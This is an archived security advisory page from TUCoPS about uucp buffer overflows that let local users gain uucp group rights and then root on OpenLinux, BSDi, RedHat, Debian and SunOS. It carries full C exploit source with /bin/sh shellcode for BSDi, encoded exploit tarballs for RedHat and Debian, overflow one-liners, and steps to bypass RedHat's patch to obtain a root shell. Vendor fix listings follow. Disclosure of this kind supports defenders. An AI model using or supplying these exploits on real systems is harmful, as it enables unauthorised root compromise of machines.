Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix4739.htm

uucp bad argument handling leads to local root exploit



14th Jan 2003 [SBWID-4739]
COMMAND

	uucp bad argument handling leads to local root exploit

SYSTEMS AFFECTED

	 OpenLinux 2.3
	 OpenLinux eServer 2.3.1 
	 OpenLinux eDesktop 2.4
	 BSDI BSD/OS 4.0.1 
	 BSDI BSD/OS 3.0 
	 SunOS 5.8
	
	 
	

PROBLEM

	Zen  Parse  found  following,   as   published   in   Caldera   advisory
	CSSA-2001-033.0.
			 
	There is a argument handling problem which allows a local attacker to  gain
	access to the uucp group. Using this access the attacker  could  use  badly
	written scripts to gain access to the root account.
	
	 Update
	 ======
	
	izik @ http://www.tty64.org added :
	
	buffer overflow is based on command line argv. for ex:
	 
	/usr/bin/uucp `perl -e 'print "A" x 900'` `perl -e 'print "A" x 900'` 
	`perl -e 'print "A" x 356'`
	
	
	 Update 2
	 =========
	
	zen-parse produced following exploit for RedHat:
	
	
	---1463783680-1077295494-1006678534=:26122
	Content-Type: APPLICATION/X-GZIP; NAME="redhat7.0-uucp-to-root.tar.gz"
	Content-Transfer-Encoding: BASE64
	Content-ID: 
	Content-Description: redhat root via uucp exploit
	Content-Disposition: ATTACHMENT; FILENAME="redhat7.0-uucp-to-root.tar.gz"
	
	H4sIAFWtADwAA+1Y+2/bNhDOz/wrrmlRJ1308jNw0wLF1iAFiraoEzTbXKCy
	RFtaJFIgKcdO2/99pB6WLdtJBhgGhvJzIkX3II+8T3d0GPYDV/RM20hTLzEE
	NRilwjrYJWy7bfd6PXm35d1euRc4sHtt23aa3XZH2jmdTqt7AJ2dRrEFKRcu
	Azi4w8RIXMbxFruH9P9TsM35x7PEwCw2ebCDOWxH5rvT2Zb/VrfZWuS/2WpK
	+15b5d/ewdwP4hfP/9Mn1igkFg8Q9gIKFAZYiJBMIE2Ai3Q8Rn+DMQMr5Swz
	TFPixhi+wo8fcASZzww+MTpyR9EcCAVFIwiJ3NUowr4JLwHPQgEOHKPLi3eD
	i4+Dy1ffilGM6Bvi2Adu/VnAelYaWRN4bU1dZok4sVhKRBByODv78vb83bWy
	QZ4rliymU3Mq1W8/nqMkHfkhAwsR6uNsnmk5PComrgQRnYzDCMNioKsrKUIy
	fLEqLyXIx6O05pOmmRCl5IbQWwIejWOX+BzevH9fPkjyiGDh0s8vxa721QXx
	Oa9NmQuQH7rRqqaUoISyWpylBKmtyDdpXVnulHwEH4/dNBJIzBMMSZhgVERc
	uU2wUGldGnItkmJETxYTI2F0wty48h//gzHb5F0uOXeO52vJ8dzI4FjFUjww
	7OFwKteLRChtXTJX+yZwDAuvJKAEQ7vXa3VPOxUbNod2z9LGlCZmRuc8vCvA
	0zDKLuj3nOfGFzAMj5JxOHm1SsWVUZr5MGWETzIlTyiNLKWo2H9typ/y6brl
	tFrbAmtuj+wxa8NxIuaF9yaiFK6FRVUksjuLwRhXti73DR7gKIJcrfZlSc2D
	e0yDmPrwG99ooWZetpqtr6xOp8D0Si65ITk6Rt8RcCwYnoT+kXTK7scnhnP8
	slCkhSJdUuAZ9qKjw2LNhyeH6mJLzc9irzww6OYFqghkkZlB47H8yDNRZ4Q5
	kOUmrepi478NWlH3kVSTTOs1qhZABIgAV3WsD4MI40T1habcNzm5z03ElQya
	pdvnlBBloTyzFJrIq4oIkqzJ8qNiewGLSrQoIGUtyFaS70pZ9st0561onSpf
	4fnzTXLZo7LYGjM4d8OsHQ0oY3Ozcf9QmROLa01h4wwbhKjqUVvoW6wLKaKt
	S/fa/7ec/7IH9dcuToAPnP/srtNbPf815Z/6/LcXVKV9qarLVntjxe4NvpXc
	CLmpnlFEwOD5QZAHLsPSgKhfx5oNYfhs+P3Tm8uLYd8e9p3hT8nnuuhWsmn4
	Wn5qcjlhXZTVq7rQY5TUZYqhwzMZhOmYk7t7gp/chbJwemMwZLtQL5uKRrYK
	UAX9BZSf2mmlaIoL4Vo73NDqsjdZDp6XgqrBrcrzs1JZF6pZ957/Le+/rEXx
	zpj+0PvvdJzq+78jvws63Y5U6/d/D6i4/BQGYZzIBnzrzkFQ1XRBcQEogc8X
	kiEncM5C+ECn0GyBc9pv2f32KXz4649LUAUbmUv/NYAzMFeayP6ZraGhoaGh
	oaGhoaGhoaGhoaGhoaHxa+NfyDBC6wAoAAA=
	---1463783680-1077295494-1006678534=:26122--
	
	
	Vade 79 posted exploit for BSDi/4.0 :
	
	
	-- usage start --
	
	bash-2.02$ id                
	uid=123(t) gid=100(user) groups=100(user)
	bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
	bash-2.02$ ./bsdi_uucp -uuparams
	[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
	v9@fakehalo.deadpig.org. ]
	*** [data]: return address: 0x80474, program:
	/usr/sbin/uuparams.
	$ id
	uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
	groups=6(uucp), 100(user)
	$ 
	
	-- usage end --
	
	-- bsdi_uucp.c start --
	
	/* (BSDi)uucp[] family buffer overflow.  by:
	   v9@fakehalo.deadpig.org.  this yields
	   euid/egid/group=6(uucp) on BSDi/4.0
	   systems. (BSDi specific exploit)
	*/
	#define UUCP "/usr/bin/uucp"
	#define UUPARAMS "/usr/sbin/uuparams"
	#define UUNAME "/usr/bin/uuname"
	#define FILLER "x"
	static char exec[]=
	 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
	 "\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
	 "\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
	 "\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
	 "\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
	void usage(char *progname){
	 printf("*** [syntax]: %s <-uucp|-uuparams|"
	 "-uuname>\n",progname);
	 exit(1);
	}
	long pointer(void){__asm__("movl %esp,%eax");}
	int main(int ac,char **av){
	 unsigned short type=0;
	 unsigned int i=0;
	 long ret;
	 char eip[1024],buf[4096];
	 char *progptr;
	 printf("[ (BSDi/4.0)uucp*[]: family buffer o"
	 "verflow, by: v9@fakehalo.deadpig.org. ]\n");
	 if(ac>1){
	  if(!strncasecmp(av[1],"-uucp",5)){
	   progptr=UUCP;
	   type=1;
	  }
	  else if(!strncasecmp(av[1],"-uuparams",9)){
	   progptr=UUPARAMS;
	   type=0;
	  }
	  else if(!strncasecmp(av[1],"-uuname",7)){
	   progptr=UUNAME;
	   type=0;
	  }
	  else
	   usage(av[0]);
	 }
	 else
	  usage(av[0]);
	 ret=(pointer()+sizeof(buf));
	 eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
	 for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
	 eip[i]=0x0;for(i=0;i<(sizeof(buf)-
	 strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
	 memcpy(buf+i,exec,strlen(exec));
	 memcpy(buf,"EXEC=",5);putenv(buf);
	 printf("*** [data]: return address: 0x%lx, p"
	 "rogram: %s.\n",ret,progptr);
	 if(execl(progptr,progptr,FILLER,
	 (type?FILLER:eip),(type?eip:0),0)){
	  printf("*** [error]: could not execute %s s"
	  "uccessfully.\n",progptr);
	  exit(1);
	 }
	 exit(0);
	}
	
	-- bsdi_uucp.c end --
	
	
	 Update  (18th January 2002)
	 =======
	
	Zen-Parse says about RedHat patch :
	
	The patch does prevent the original exploit from working.
	
	However, a trivial patch to the exploit I posted makes  it  work  again.
	local user -> uucp (via this problem) -> root  (on  some  distributions,
	via  /usr/sbin/makewhatis:  '${PATH:0:1}  (or  similar)  +   redirection
	characters' issue.)
	
	$ cd redhat7.0-uucp-to-root
	$ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
	$ mv tmp-exp-erm.sh exp-erm.sh
	$ ./runme
	
	and wait for /tmp/rootshell to appear.
	
	 Update (21 January 2002)
	 ======
	
	Exploit on Debian PowerPC unstable, by Charles Stevenson :
	
	 
	begin 644 debian-uucp.tar.gz
	M'XL(`$B?2CP``^U7;6_;-A#.U_%77)6A<;+8EE]2#VT2M,A:M$/6!G6,IFB+
	M5I9HBZU,"J3HV%O[WW>D)$M^2].AQ3!,!UFR>,>[X]W#XRF@0^;QNM9^W-SY
	M0>2Z7;?7.\*GV^H=N>5G3CMNK]MN'[5ZW4YKQVVU>NW>#AS]*(?*I%7B28`=
	M7TAZD]S7^/]1"DKYI[.X3N6DH<+O:\-MN6[O:&O^>V[GWDK^._>ZW1UPOZ\;
	MF^E_GO_=.\TAXTT5DEVR"\,Y_$EY/?:DHG;@#Q&P$:.!X9R%GHRH@GY"IY0K
	MP>'8!.7A4'RBPFOX8G)JYV@6@$XF,2">(L$2\'@`L5"*#:.YY4HA$F"C]"DD
	MSDG_77.T%$OA4Z5`:JY`ZQD*@(&GU7TIQ4>/0R"HXGL)T-&(^@DD(861YG["
	MT"DQLN+IM%DZBZH$-2/S-PMWN!#75%Z<P8!C]H<1)83ZH0!'X"*I_XGQL7'/
	MJF$*F)&*(AHXY`W49]#42MJH:<V]"85W\/DSU,"JF,&%%$//K)2+3$,^O0$/
	M,"88D!;LERQ*ZB7&8AZN$<,H.^3RZ;/^TQ?]RY,/F9EZ]($H7(9JOLZH^7,N
	MU!S#:7/JR2;&O8F12T+T^_CXU>,GSZZ,#/&]I"0QG3:FR'[\X@F)]3!@$IJ$
	MBX!:.]-</<D,%P.1&!OO8*%H,,`A@NM+EL?S$8+U1:_,T=H.$LT_<4PY('`F
	M"!$%C\[/\Q>$8!(NIMQ/;UG8[YL;47.U8C(=(`'SHF5./D)B(5?\S$>("44:
	MI'5F'BE\A8"./!TE))G'%&(64Y)Y7$P;T\3BM5"YYDFFT0^]I(YX'TMO4LP?
	M?:14;IJ=+SF=/)FO)<?WHKJBQI?L15*?LBFNER0,93T^-W%+Z`06L^)0<`K=
	M7J]S[]>C`@V;7;MA:2,AXH;%>^K>`.B41?9&SM*-4'\%];HO^(B=+"-Q24D[
	MU9([>,<R52Q$U+2GU`+\5PV\\K>K3JO3V>97>[MCMUD:G<3)/)N]"2?9U$RB
	MJ*CV*2=0'Q6RG@KJ*J11!"G;A*7$5N$-HN%$!/"+VBAA+)>E9NLK6T53V/!S
	M*'F,U_;)7P04323%$EW#2?:Y?UAO[3_(&..,,2XQZ(SZ4<W)UNP<.N;F(N?+
	M1@AK%;(EN[`P;,RYF:UQ_O_;U"?V>'B/&`O$9&&F>0`K#`('>-WV4$N%L8S'
	M3*9'X;(Z3!J.*:%E(/0X1.$F(;N,^Q%6.CC&'6?K82,\+8\F$HO^\ICF3"6!
	M&2.[6&@8;LS!X.SB_<6CRZ?@V/H7L6&Z#2RD&WAV1$Y)^&J;[&Q%]/+EB]\?
	M/<^E\_@U;'X<0AA/P*+"_/'DV#\$K`@2#@[P9;IXH7P:[P.F#\QY68`&3D[`
	MS1A(>-)=\UK)Y"&X>)G\9GS$[`J_BQUC*O#%W'(3&#:\:L:+-^Z[0\>LS]F_
	M<_)\<'Y>HF=+:(GB'UFOK;:&21HINT3E;J%S3>+5=H?E)Q+'DX!8`]:$N
	M8#-"MPPC/E=FI7F!U6VT*E:N'F9[$V+ZI[U;%M^TS*V6VT8?H:N+GF/OFW06
	MI\(MRSA6\=Y>T1SU*4_;NT63<!_Z$:6Q:9C:6"E,Q%3#(<H,0KO45D74XT9*
	MQPMW'.(7YS3!RFQKH/'Q`!:'_>*,SH];NZ(T.'EGE5=\#'A>T=Z2U1PN7$F;
	M5NN+F62:!0,Q@MA+^\GU>OX.6T5<-K?HLWK>DI\<$\:B]\S?-I2$!\X&^=FZ
	M^&Q)&DOI,CQ/EZS=2FR62]ECR&SBKSIY@V39O\_K82)F"Q<A<F;PQ&.VT>X+
	M*><(BQ$C)L]+_A:)>:FY38L!6)9/U-J`UT+C7Z$C_%2A$X$-E,WZ-28$YD+O
	M240)=DV-_'M@4_[NWMTTCA\*UOC>JJN(^6^&`R[,]M_;XV.67WP#D#34NMP<
	M9(@FIKZMC_[;7Z<5551111555%%%%5544445551111555%%%%?U3^ALU;SY*
	$`"@`````
	`
	end
	
	
	  Update (14 January 2003)
	  ======
	
	hipnosis [hipnosis@softhome.net] reported for SunOS :
	
	Buffer is overflow when the app uucp is executed with the  parameter  -s
	continued of a string bigger than 7525 bytes.
	
	hipnosis% uucp -s `perl -e 'print "A"x7526'`
	Segmentation Fault
	hipnosis% uucp -s `perl -e 'print "A"x7525'`
	hipnosis%
	
	
	

SOLUTION

	Workaround none
		 
	The proper solution is to upgrade to the latest packages.
	
	Mandrake location of fixed packages
	 
	http://www.linux-mandrake.com/en/ftp.php3.
	
			 
	OpenLinux 2.3, Location of Fixed Packages
			 
	The upgrade packages can be found  on  Caldera\'s  FTP  site  at:  		         ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/RPMS
	
	The  corresponding  source  code  package  can  be   found   at:   		   ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/SRPMS
	
	Verification 
	  dd0f6e46374d62c349bf7a1f618a23a0  RPMS/uucp-1.06.2-8OL.i386.rpm
			        33b96ff362a261b87f73b2377fa20a5d  RPMS/uucp-doc-1.06.2-8OL.i386.rpm
			        e602cfba314e2519e2762bfecac9024c  SRPMS/uucp-1.06.2-8OL.src.rpm
			        
			 
			  Installing Fixed Packages
			 
			        Upgrade the affected packages with the following commands:
			 
			          rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
			               uucp-doc-1.06.2-8OL.i386.rpm
			                 
			 
			 OpenLinux eServer 2.3.1 and OpenLinux eBuilder for ECential 3.0
			 
			  Location of Fixed Packages
			 
			  		 The upgrade packages can be found on Caldera\'s FTP site at:
			 
			 		 ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS
			                 
			  		 The corresponding source code package can be found at:
			 
			  		 ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS
			                 
			  Verification
			 
			        ee5c7f9bf1887d3c34f8c232b70a84b7  RPMS/uucp-1.06.2-8OL.i386.rpm
			        26f7f712e318c63a5deea1474a58e06f  RPMS/uucp-doc-1.06.2-8OL.i386.rpm
			        e602cfba314e2519e2762bfecac9024c  SRPMS/uucp-1.06.2-8OL.src.rpm
			                        
			 
			  Installing Fixed Packages
			 
			        Upgrade the affected packages with the following commands:
			 
			          rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
			               uucp-doc-1.06.2-8OL.i386.rpm
			                                 
			 
			 OpenLinux eDesktop 2.4
			 
			  Location of Fixed Packages
			 
			        The upgrade packages can be found on Caldera\'s FTP site at:
			 
			        ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/RPMS
			                                 
			        The corresponding source code package can be found at:
			 
			        ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/SRPMS
			  
			  Verification
			 
			        1f00b87ce48e72d8a4bd754123d554d4  RPMS/uucp-1.06.2-8OL.i386.rpm
			        c00296b93945c8778c46252e975818d2  RPMS/uucp-doc-1.06.2-8OL.i386.rpm
			        e602cfba314e2519e2762bfecac9024c  SRPMS/uucp-1.06.2-8OL.src.rpm
			        
			 
			  Installing Fixed Packages
			 
			        Upgrade the affected packages with the following commands:
			 
			          rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
			               uucp-doc-1.06.2-8OL.i386.rpm
			          
			 
			 OpenLinux 3.1 Server
			 
			  Location of Fixed Packages
			 
			        The upgrade packages can be found on Caldera\'s FTP site at:
			 
			        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
			 
			        The corresponding source code package can be found at:
			 
			        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
			 
			  Verification
			 
			        4e3b47bc507d48bf9396e70c806d9a8e  RPMS/uucp-1.06.2-8.i386.rpm
			        41cabb92a4eb86310d01c6a6b2f7453b  RPMS/uucp-doc-html-1.06.2-8.i386.rpm
			        d06d2cd63b739895ebf82fa361266f16  RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
			        6f3e6037bd3839380f9a4104e55a9a73  SRPMS/uucp-1.06.2-8.src.rpm
			        
			 
			  Installing Fixed Packages
			 
			        Upgrade the affected packages with the following commands:
			 
			          rpm -Fvh uucp-1.06.2-8.i386.rpm \\
			               uucp-doc-html-1.06.2-8.i386.rpm \\
			               uucp-doc-ps-1.06.2-8.i386.rpm
			         
			 
			 OpenLinux 3.1 Workstation
			 
			  Location of Fixed Packages
			 
			        The upgrade packages can be found on Caldera\'s FTP site at:
			 
			        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
			 
			        The corresponding source code package can be found at:
			 
			        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
			 
			  Verification
			 
			        4e3b47bc507d48bf9396e70c806d9a8e  RPMS/uucp-1.06.2-8.i386.rpm
			        41cabb92a4eb86310d01c6a6b2f7453b  RPMS/uucp-doc-html-1.06.2-8.i386.rpm
			        d06d2cd63b739895ebf82fa361266f16  RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
			        6f3e6037bd3839380f9a4104e55a9a73  SRPMS/uucp-1.06.2-8.src.rpm
			        
			 
			  Installing Fixed Packages
			 
			        Upgrade the affected packages with the following commands:
			 
			          rpm -Fvh uucp-1.06.2-8.i386.rpm \\
			               uucp-doc-html-1.06.2-8.i386.rpm \\
			               uucp-doc-ps-1.06.2-8.i386.rpm
			 
			 
			 Conectiva linux
			 
			 ftp://atualizacoes.conectiva.com.br/4.0/i386/uucp-1.06.1-21U40_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/uucp-1.06.1-21U40_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/4.0es/i386/uucp-1.06.1-21U40_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/4.1/i386/uucp-1.06.1-21U41_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/4.2/i386/uucp-1.06.1-21U42_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/uucp-1.06.1-21U42_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/5.0/i386/uucp-1.06.1-22U50_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/5.1/i386/uucp-1.06.1-23U51_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/uucp-1.06.1-23U51_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/6.0/i386/uucp-1.06.2-4U60_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/uucp-1.06.2-4U60_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-1.06.2-6U70_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-cu-1.06.2-6U70_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-doc-1.06.2-6U70_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/uucp-1.06.2-6U70_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/uucp-1.06.1-22U50_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
			 ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/uucp-1.06.1-22U50_1cl.i386.rpm
			 ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
			 
			 
	 Update (21 January 2002)
	 ======		 
	
	RedHat posted a fix for the --config exploit :
	
	Red Hat Linux 6.2:
	
	SRPMS: 
	ftp://updates.redhat.com/6.2/en/os/SRPMS/uucp-1.06.1-31.6x.src.rpm 
	alpha: ftp://updates.redhat.com/6.2/en/os/alpha/uucp-1.06.1-31.6x.alpha.rpm 
	i386: ftp://updates.redhat.com/6.2/en/os/i386/uucp-1.06.1-31.6x.i386.rpm 
	sparc: ftp://updates.redhat.com/6.2/en/os/sparc/uucp-1.06.1-31.6x.sparc.rpm 
	
	Red Hat Linux 7.0:
	
	SRPMS: 
	ftp://updates.redhat.com/7.0/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm 
	alpha: ftp://updates.redhat.com/7.0/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm 
	i386: ftp://updates.redhat.com/7.0/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm 
	
	Red Hat Linux 7.1:
	
	SRPMS: 
	ftp://updates.redhat.com/7.1/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm 
	alpha: ftp://updates.redhat.com/7.1/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm 
	i386: ftp://updates.redhat.com/7.1/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm 
	ia64: ftp://updates.redhat.com/7.1/en/os/ia64/uucp-1.06.1-31.7.1.ia64.rpm 
	
	Red Hat Linux 7.2:
	
	SRPMS: 
	ftp://updates.redhat.com/7.2/en/os/SRPMS/uucp-1.06.1-32.src.rpm 
	i386: ftp://updates.redhat.com/7.2/en/os/i386/uucp-1.06.1-32.i386.rpm 
	ia64: ftp://updates.redhat.com/7.2/en/os/ia64/uucp-1.06.1-32.ia64.rpm 
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH